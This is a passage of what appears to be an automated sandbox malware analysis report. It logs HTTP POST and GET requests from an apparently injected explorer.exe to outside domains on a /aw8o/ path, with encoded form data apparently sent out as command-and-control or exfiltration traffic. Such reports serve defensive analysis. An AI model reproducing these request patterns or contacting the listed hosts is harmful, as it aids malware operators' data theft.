44 58 77 50 44 4c 73 72 78 54 73 33 47 32 4f 4c 73 49 65 7a 73 51 48 38 2f 2b 33 66 31 7a 38 48 4d 2f 41 30 4a 58 7a 69 6c 76 45 67 76 6d 41 7a 38 2b 63 42 52 75 54 71 52 61 63 6e 65 57 43 46 59 39 5a 6d 37 44 5a 77 39 46 34 45 73 33 4f 54 4e 65 5a 61 2f 76 67 35 4a 55 2b 6e 36 63 72 4a 64 59 4c 54 2b 33 43 4f 6e 4c 71 54 78 67 2f 37 78 42 55 4c 6f 2b 75 2b 75 2b 42 51 76 6d 4c 6a 67 73 57 4a 53 75 77 7a 61 64 2b 30 34 52 47 6b 70 46 30 7a 71 4f 74 78 32 38 51 73 57 4d 57 53 61 6b 69 47 35 30 41 4a 6e 58 63 52 5a 36 79 56 64 70 4d 2f 56 62 35 7a 45 36 4d 74 4f 36 49 45 35 63 74 4b 39 50 4f 62 35 6c 5a 67 2b 68 52 5a 79 56 49 31 2b 39 59 65 50 79 37 35 35 67 2f 6e 37 48 66 66 65 76 77 76 79 7a 61 50 57 35 59 50 4d 35 4f 41 66 4c 43 66 44 45 37 45 72 38 52 59 41 4e 7a 6d 33 6d 6c 6c 4f 50 41 52 78 58 73 67 39 6e 35 76 32 64 4e 33 4a 30 69 4e 69 33 45 51 73 78 6f 73 61 2f 68 39 48 54 31 55 53 57 67 35 2b 6d 79 51 6b 4c 72 41 58 34 6c 32 44 53 52 6e 68 4f 62 7a 78 30 6c 71 76 32 4a 43 70 45 37 76 52 77 52 58 4b 79 56 45 66 58 6e 42 66 48 42 7a 57 78 6b 61 57 36 2b 65 70 6e 49 64 4f 69 75 41 41 4b 63 47 61 4d 79 68 31 4d 37 36 64 74 6d 6b 6a 71 4f 33 4e 33 57 77 47 2f 66 72 47 4d 65 2b 72 32 2b 4a 70 2b 36 7a 59 44 30 2b 44 58 75 79 2f 77 69 77 44 6c 6a 66 58 43 34 54 50 6d 59 58 51 37 35 7a 30 6f 4e 76 2b 31 45 32 37 70 65 51 70 5a 75 30 6f 52 62 62 7a 49 4c 55 47 67 43 55 62 51 43 44 77 61 54 6c 36 76 48 54 78 6a 6a 72 75 59 6e 33 6e 4d 48 2f 67 52 41 51 4e 4c 30 6c 32 59 69 74 70 6d 7a 38 73 35 47 66 45 44 6e 5a 50 71 56 6f 50 66 6d 2b 44 59 32 61 49 4b 43 44 67 75 6a 31 58 43 4f 66 59 6f 59 45 73 46 4b 52 6f 77 34 6f 6d 62 61 58 44 42 72 41 31 53 70 32 32 47 30 2f 65 66 75 48 6b 65 53 36 4f 77 6e 57 43 71 44 36 72 2b 67 57 4f 31 48 48 75 77 4c 49 43 71
                                                                                                                                                                                          Data Ascii: 1NM6e=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
                                                                                                                                                                                          Aug 10, 2023 10:19:30.687736034 CEST554OUTData Raw: 4b 79 34 6e 34 42 39 30 36 49 30 39 6d 44 50 4c 6a 72 66 77 77 58 2b 4b 72 36 4d 68 41 65 76 31 46 4c 47 65 4f 31 56 75 64 32 4f 46 44 76 47 45 36 4a 64 72 42 79 49 77 31 6c 73 68 69 76 6f 48 4b 2f 46 72 35 61 6c 33 6e 4e 6d 35 58 50 69 51 6b 34
                                                                                                                                                                                          Data Ascii: Ky4n4B906I09mDPLjrfwwX+Kr6MhAev1FLGeO1Vud2OFDvGE6JdrByIw1lshivoHK/Fr5al3nNm5XPiQk4QZjOrAj93NVdlydKdiuNSa0przNdGdZRTicPPXWSHFmTl/6Ak5iy1MzF4KbB8V5qj9JNqt7iVCd+N0zWeJmOoWzrQInfQox+2F+frGjEJlt7pAUlNYmXbcTQIab39vDoYr32sST8cvb6aFhkwbJkTL7LNR8p7W4Mq
                                                                                                                                                                                          Aug 10, 2023 10:19:30.696525097 CEST557OUTData Raw: 4b 39 4f 6e 4d 46 44 4e 4f 53 36 64 57 71 75 78 66 67 43 50 30 4a 71 39 6d 74 6a 31 4f 33 6f 46 70 49 2f 76 32 64 39 6f 69 58 35 53 4c 37 43 67 4e 72 34 69 4e 46 43 74 48 2b 54 44 6e 2f 33 51 47 4b 6f 52 78 61 70 63 76 4b 5a 45 4b 76 4f 63 61 33
                                                                                                                                                                                          Data Ascii: K9OnMFDNOS6dWquxfgCP0Jq9mtj1O3oFpI/v2d9oiX5SL7CgNr4iNFCtH+TDn/3QGKoRxapcvKZEKvOca3qFbTWTrMZV/RFbwivV6ll4uKLURN2mZRHudK0ZEfg/Nu5p9usYeTQ9nzVHVxF6sG64CmXrzRz1+n1ZmrjD/yvWsGmuxnNvTaJGl3aRASfkD6WSYy1J47Y0gLarFu898/RRc6iuWK+nvkmvyE4y/t5ARX0sUMAuYoD
                                                                                                                                                                                          Aug 10, 2023 10:19:30.696681976 CEST560OUTData Raw: 65 71 73 79 79 70 49 41 49 4b 78 50 53 7a 77 36 6a 39 79 4c 52 2b 4b 38 50 32 59 37 59 76 58 63 50 46 7a 2b 31 47 42 57 73 35 4a 31 57 75 30 37 37 79 6e 35 73 44 51 34 7a 63 4b 62 42 55 45 54 30 73 73 32 6c 6a 39 6b 6f 43 32 5a 46 44 39 33 70 47
                                                                                                                                                                                          Data Ascii: eqsyypIAIKxPSzw6j9yLR+K8P2Y7YvXcPFz+1GBWs5J1Wu077yn5sDQ4zcKbBUET0ss2lj9koC2ZFD93pGDtTZhMB0gQ1ffC2MvUHILZmfPXNk50mnhzzhlPXn9yW4okzGX1zZfFz3cJJpSVKNO1mB8En1GDSWE3XMiMr9xAIhuuZXRISyoRum9dT5FwUdlLcd/YNPXOLNINJly/hHpU/TaDvs300bDqdfCuC2qg11i/6juZ9eT
                                                                                                                                                                                          Aug 10, 2023 10:19:30.696850061 CEST565OUTData Raw: 53 2b 6c 6d 48 31 64 59 75 47 46 62 39 4a 6a 70 43 50 73 55 50 75 2f 55 73 30 51 67 4c 48 51 4a 66 77 67 6e 57 4c 48 38 43 49 6a 43 4f 41 43 48 66 70 37 4a 35 71 2f 77 61 38 69 30 57 31 56 76 43 4f 2f 49 4a 61 42 34 59 37 42 4b 73 7a 75 64 74 4e
                                                                                                                                                                                          Data Ascii: S+lmH1dYuGFb9JjpCPsUPu/Us0QgLHQJfwgnWLH8CIjCOACHfp7J5q/wa8i0W1VvCO/IJaB4Y7BKszudtNQrRlN5uLUXOiiqyuBAGM8SJFghkgoeOdeEELv1wnIrWA0AzW2lISA2PDAQtN4B0cuDnckHapQFge68oGnGhVd78ghcEMysT6H77Td9wRf1bI7jPpHm18sOHF2dA36pRJ7dXov2SyQoQR+4IwKJsfinlT86W1zw9Rb
                                                                                                                                                                                          Aug 10, 2023 10:19:30.697017908 CEST567OUTData Raw: 4a 6d 6d 50 73 6e 41 78 67 6f 36 53 4a 65 62 44 63 67 79 5a 65 7a 66 6d 71 44 70 6e 35 2f 50 41 6b 7a 61 54 63 35 48 37 51 35 61 72 38 70 48 55 31 30 78 64 45 67 4a 56 4f 44 73 78 49 35 71 44 69 2f 43 67 4a 38 4d 6e 42 70 75 45 45 55 6b 33 46 38
                                                                                                                                                                                          Data Ascii: JmmPsnAxgo6SJebDcgyZezfmqDpn5/PAkzaTc5H7Q5ar8pHU10xdEgJVODsxI5qDi/CgJ8MnBpuEEUk3F8SDSGYOROm+YMaZBOClGHtCj6N2PPTS9suTMzJR+9qO09wtasDXjCpVOPSJUdmGOE/yiX6/e/VUGPkorGCdk6T3jxpw5NpbUSACYs/2mSZ6DTTQXPXbjxbcRgZeD0o8ucU1KI7R2UJA+OqogRaFCNpH5Z/5sdNhjy9
                                                                                                                                                                                          Aug 10, 2023 10:19:30.697192907 CEST576OUTData Raw: 79 39 6b 34 43 37 31 43 38 56 56 31 4a 66 53 6c 2b 45 45 38 41 70 43 56 77 72 4b 76 66 54 75 42 68 78 79 72 33 75 73 4c 6a 6f 4b 41 41 73 6d 36 63 41 7a 79 67 32 69 6a 41 30 2f 36 7a 44 41 77 78 63 51 36 5a 36 68 4f 54 71 6c 74 76 61 30 2b 74 34
                                                                                                                                                                                          Data Ascii: y9k4C71C8VV1JfSl+EE8ApCVwrKvfTuBhxyr3usLjoKAAsm6cAzyg2ijA0/6zDAwxcQ6Z6hOTqltva0+t4GRPw5h8sn1uI+nSiNms8mP6QjUdC36i+14zRzP+iSGxkKSCxe+h/vrS3A6CSPYUZZ8XtFXQXH/AduB48avu79dKxuFhbbFaSUa93VjiVMktXqXtVH/O+xkplvDUD17/fBbRuSchlvgZXFIH+ydtRsHPx/EliLJz4f
                                                                                                                                                                                          Aug 10, 2023 10:19:30.697361946 CEST580OUTData Raw: 74 6b 61 2f 4e 50 34 32 2f 70 51 70 75 50 74 61 4d 4f 6f 2b 53 46 30 67 43 62 6b 67 58 6b 2b 46 46 39 52 6d 6b 49 35 53 2f 72 4e 4a 53 54 47 52 61 54 50 38 46 32 4e 70 34 6c 71 62 44 48 6e 48 6e 30 41 2f 55 47 74 74 59 6f 58 58 55 36 4d 67 43 71
                                                                                                                                                                                          Data Ascii: tka/NP42/pQpuPtaMOo+SF0gCbkgXk+FF9RmkI5S/rNJSTGRaTP8F2Np4lqbDHnHn0A/UGttYoXXU6MgCqcGODdraem1yoq1enET+R8DrNNspuU6i4GvFMrwIrO0wfoiNr4541t9QkkZkDnHi5913c+ypKBFHhfQMTKeNZp9gnmUQwzN1Q8rQNHkog+lUcp98pNf4F52Bt2NUVB9haAG6gYZH+7E+6u7G+E1UthvF8DbgKIwYoc
                                                                                                                                                                                          Aug 10, 2023 10:19:30.705461979 CEST583OUTData Raw: 62 51 6f 35 66 4a 37 7a 6f 79 70 64 30 6d 4b 64 68 48 74 52 49 77 56 51 41 73 42 4f 7a 41 5a 72 4c 54 68 2b 41 78 77 70 73 50 68 4d 68 6f 49 30 75 43 4c 2b 52 58 65 42 62 36 7a 4c 47 4c 4a 73 39 32 74 4d 31 39 67 6d 4c 39 78 30 76 66 63 41 63 68
                                                                                                                                                                                          Data Ascii: bQo5fJ7zoypd0mKdhHtRIwVQAsBOzAZrLTh+AxwpsPhMhoI0uCL+RXeBb6zLGLJs92tM19gmL9x0vfcAchENLkoxXrfaMDZZpKtx7JISPbFED3U1yrlVN1ypGIsrc4m+B48RcjjlhJZu0FWqdiXt27NnjSK/0X8fsg4HD6VGwSHc+Rsa0bUuZOpKQOPqOKUIDa6hFQrGWwyzyN4K//KfqF4po0pj2WCgD7j84EKO8/YpJTFX7kh
                                                                                                                                                                                          Aug 10, 2023 10:19:30.705629110 CEST595OUTData Raw: 74 44 43 6c 6f 75 59 42 4b 7a 38 65 48 35 76 30 39 75 47 44 72 59 2b 48 4c 70 39 66 50 5a 68 6c 47 39 4b 4a 53 36 39 69 69 6d 74 6e 57 4c 2f 49 4b 45 4b 73 41 4a 37 36 39 7a 77 70 66 59 68 55 77 6d 4c 61 47 68 55 61 4f 47 70 4d 78 52 64 57 71 64
                                                                                                                                                                                          Data Ascii: tDClouYBKz8eH5v09uGDrY+HLp9fPZhlG9KJS69iimtnWL/IKEKsAJ769zwpfYhUwmLaGhUaOGpMxRdWqdIVfHNxQH2xHgHJLqeWF2ipaBYaehRCKHmBfC8b9IVEcJb9gzJsMtxyaLEnEnuLTqMQfwTK7LYYDDJfLAPnuVGmy9x+nKLEf8Gg0qzoxIdaGRA6jQicfs/F4xh5z+koCByGfOSfwg+IeY8Oaz1RnIvZJHZAvqWa3PN
                                                                                                                                                                                          Aug 10, 2023 10:19:30.749484062 CEST596INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Thu, 10 Aug 2023 08:19:30 GMT
                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Set-Cookie: ch1c=b
                                                                                                                                                                                          Content-Security-Policy: frame-ancestors 'none';
                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2gJLEfx%2FFwel6Gg1gTMhlH8vFGP7PSblAGWrwQYjXSJooyUTuYGVpBLWtmynZpaWo5iE20vTO2%2BivlknIkcdFIQVbhyjd5WEJiI%2F9m499dfykQiYPdWDV%2BUo4qAob43%2FrqyX1kZ1LouY3hI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                          CF-RAY: 7f46d074ddca1941-FRA
                                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                          Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a
                                                                                                                                                                                          Data Ascii: 19
                                                                                                                                                                                          Aug 10, 2023 10:19:30.749526978 CEST596INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                          14192.168.11.2049729104.21.62.3080C:\Windows\explorer.exe
                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                          Aug 10, 2023 10:19:33.218143940 CEST597OUTGET /aw8o/?1NM6e=taxf5j588OeYZZ7u8xH1eBnKDxsrb249ZHPrEnAhG3HGAn0ZxHMys4uYbZGY9eDFVkb7zYlxcXM3bVIeT/ayzX9aM5XiamXyxQ==&P4=_n5TPHiTKZj HTTP/1.1
                                                                                                                                                                                          Host: www.zenturasolutions.com
                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                                                                                                                                          Aug 10, 2023 10:19:33.260078907 CEST598INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Thu, 10 Aug 2023 08:19:33 GMT
                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Set-Cookie: ch1c=b
                                                                                                                                                                                          Content-Security-Policy: frame-ancestors 'none';
                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NfJbBP2Mw97v3UKFYO24tqVP%2BBQT4NMEuq%2FEsjq%2F%2FiRXwmcjuF43C9Vyf3j9HqqCK7mahl%2FdzE4dMTMNel7y9%2B6c6U3HpwqoL21gSgNT5Iu5JFDZhnS1MwiV%2BwCqQJia8%2BAYVehO1XkRspg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                          CF-RAY: 7f46d084abdc6931-FRA
                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                          15192.168.11.204973051.79.96.11580C:\Windows\explorer.exe
                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                          Aug 10, 2023 10:19:38.625827074 CEST599OUTPOST /aw8o/ HTTP/1.1
                                                                                                                                                                                          Host: www.wolfcapital.top
                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Origin: http://www.wolfcapital.top
                                                                                                                                                                                          Referer: http://www.wolfcapital.top/aw8o/
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 186
                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                                                                                                                                          Data Raw: 31 4e 4d 36 65 3d 34 4c 33 61 31 52 66 42 6b 4f 6d 66 72 69 52 73 54 58 6b 71 34 76 74 32 35 68 78 2b 51 58 68 78 47 46 6b 4e 2b 48 54 6d 38 76 7a 49 4e 71 67 76 32 37 49 50 54 47 33 69 66 33 53 77 74 49 65 58 63 57 49 52 49 31 2f 5a 79 7a 47 59 6f 59 34 43 67 4a 4c 7a 66 53 37 41 6b 48 75 34 37 61 38 65 33 6d 48 51 77 68 74 67 58 58 76 4d 6d 76 77 6f 46 68 4b 4c 6e 70 38 57 39 2b 47 41 43 42 48 7a 42 4d 58 58 46 5a 53 56 45 42 4b 49 65 59 61 4c 31 79 53 69 55 35 42 4e 58 4b 6f 4e 32 61 64 65 71 63 47 30 75 46 63 44 73 34 36 75 73 63 56 43 2f 51 3d 3d
                                                                                                                                                                                          Data Ascii: 1NM6e=4L3a1RfBkOmfriRsTXkq4vt25hx+QXhxGFkN+HTm8vzINqgv27IPTG3if3SwtIeXcWIRI1/ZyzGYoY4CgJLzfS7AkHu47a8e3mHQwhtgXXvMmvwoFhKLnp8W9+GACBHzBMXXFZSVEBKIeYaL1ySiU5BNXKoN2adeqcG0uFcDs46uscVC/Q==
                                                                                                                                                                                          Aug 10, 2023 10:19:38.722115993 CEST600INHTTP/1.1 404 Not Found
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                          pragma: no-cache
                                                                                                                                                                                          content-type: text/html
                                                                                                                                                                                          content-length: 708
                                                                                                                                                                                          date: Thu, 10 Aug 2023 08:19:38 GMT
                                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
